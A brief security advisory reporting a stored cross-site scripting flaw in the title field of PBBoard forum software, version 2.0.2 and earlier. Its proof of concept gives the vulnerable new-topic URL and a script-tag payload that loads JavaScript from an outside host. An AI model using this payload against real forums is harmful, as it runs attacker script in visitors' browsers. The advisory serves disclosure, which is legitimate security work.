[Sec-Area Advisory]pbboard <=2.0.2 - XSS in Topic Details ======= Product: PHP <= PBBoard Security-Risk: moderated Remote-Exploit: yes Vendor-URL: http://www.pbboard.com Credits ============ Discovered by: rUnViRuS site: http://www.sec-area.com Affected Products: ---------------------------- test on PBBoard 2.0.2 maybe work under 2.0.2 Original Advisory: ============ http://www.sec-area.com/?p=141 More Details ============ 1. Cross-site scripting ----------------------------------- enable malicious attackers to inject client-side script into web pages Proof of concept: Make a new topic in In the title Write some Javascript/HTML Back to forums You will find the code works Proof of concept code: go to : http://www.pbboard.com/forums/index.php?page=new_topic&index=1&id=[Section id ] then In the title Write some Javascript/HTML like : <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js";></SCRIPT> Back to forums You will find the code works -------------------------------------------- [W]orld [D]efacers [T]eam http://www.Sec-area.com --------------------------------------------
